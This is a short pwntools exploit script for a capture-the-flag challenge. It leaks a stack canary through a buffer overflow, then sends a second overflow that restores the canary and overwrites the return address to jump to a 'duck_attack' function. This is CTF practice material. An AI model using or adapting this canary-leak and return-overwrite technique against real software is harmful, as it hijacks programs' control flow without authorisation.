from pwn import *  # Import pwntools

def connect(args):
    # Establish either a local or remote connection
    if args.remote and args.host and args.port:
        conn = remote(args.host, args.port)
        print(f"Connecting to {args.host}:{args.port}")
    elif args.local and args.binary:
        conn = process(args.binary)
        print(f"Launching local binary: {args.binary}")
    else:
        print("Error: You must specify either --remote with host and port or --local with a binary path.")
        return
    return conn

def main():
    import argparse
    parser = argparse.ArgumentParser(description="CTF Exploit Script")
    parser.add_argument("--remote", action="store_true", help="Use remote connection")
    parser.add_argument("--host", type=str, help="Remote host")
    parser.add_argument("--port", type=int, help="Remote port")
    parser.add_argument("--local", action="store_true", help="Run local binary")
    parser.add_argument("--binary", type=str, help="Path to local binary")
    args = parser.parse_args()

    conn = connect(args)

    # Get stack canary
    conn.recvuntil(b"> ")
    conn.sendline(b"_"*89 + b"Quack Quack ")
    response = conn.recvline(timeout=2)
    canary_b = b'\x00' + response[len(b"Quack Quack "):len(b"Quack Quack ") + 7]
    log.info("Found canary: %08x", u64(canary_b))

    # Jump to duck_attack
    conn.recvuntil(b"> ")
    conn.sendline(b'_'*88 + canary_b + b'_'*8 + b'\x7f\x13\x40')
    response = conn.recvline(timeout=2)

    conn.interactive()

if __name__ == "__main__":
    main()

